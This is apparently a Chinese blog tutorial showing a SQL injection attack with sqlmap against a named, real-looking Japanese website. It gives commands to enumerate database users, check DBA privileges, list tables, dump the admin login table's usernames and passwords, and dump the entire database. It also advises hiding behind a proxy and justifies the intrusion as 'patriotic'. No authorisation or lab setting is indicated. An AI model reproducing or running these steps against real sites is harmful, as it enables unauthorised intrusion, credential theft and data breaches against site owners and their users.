今天的主角:
网址是:https://henecia.jp/goodsnews/detail.php?nid=63
这个页面有一个注入点,可以用sqlmap进行注入攻击。
攻击机kali:
kali中内置了sqlmap工具,所以这次测试就在kali中进行。
kali的安装可以看我以前的推送,我记得有一篇推送是教大家怎么安装kali系统的。
攻击过程:
1.查看基本信息命令:
sqlmap -u “http://henecia.jp/goodsnews/detail.php?nid=63“
结果:
2.查看当前用户
命令:
sqlmap -u “http://henecia.jp/goodsnews/detail.php?nid=63“ —users -v 0
结果:
3.查看当前用户是否有dba权限:
命令:
sqlmap -u “http://henecia.jp/goodsnews/detail.php?nid=63“ —is-dba -v 1
结果:
4.查看当前用户密码:
命令:
sqlmap -u “http://henecia.jp/goodsnews/detail.php?nid=63“ —passwords -v 0
结果:
没有查出来,可能是因为用户没有dba权限
5.查看所有存在的库:
命令:
sqlmap -u “http://henecia.jp/goodsnews/detail.php?nid=63“ —dbs -v 0
结果:
6.爆库下的表:
这次我们爆henecia表
命令:
sqlmap -u “http://henecia.jp/goodsnews/detail.php?nid=63“ —tables -D “henecia”
结果:
7.爆TM_ADMIN_MEMBER表字段
命令:
sqlmap -u “http://henecia.jp/goodsnews/detail.php?nid=63“ —columns -D “henecia” -T “TM_ADMIN_MEMBER”
结果:
8.爆字段内容:
命令:
sqlmap -u “http://henecia.jp/goodsnews/detail.php?nid=63“ —dump -D “henecia” -T “TM_ADMIN_MEMBER” -C “login_uid,login_pwd”
结果:
接下来就是找后台登陆了,可以使用御剑扫一扫,不过这个后台没找出来。
9.脱裤:
命令:
sqlmap -u “http://henecia.jp/goodsnews/detail.php?nid=63“ —dump-all -D henecia
结果:
脱下来的数据会保存到本地的文件夹下,在脱裤完成后会提示保存的位置
从这张图中可以看见正在下载网站的数据库,由于数据库较大,这里就不放结果了。
总结:
大家想自己做测试的时候要注意一些,最好挂上代理,就像这个一样就行
不过,大家尽量还是不要攻击别人的网站,这个是日本的一个网站,测试一下,就当爱国了
领取专属 10元无门槛券
私享最新 技术干货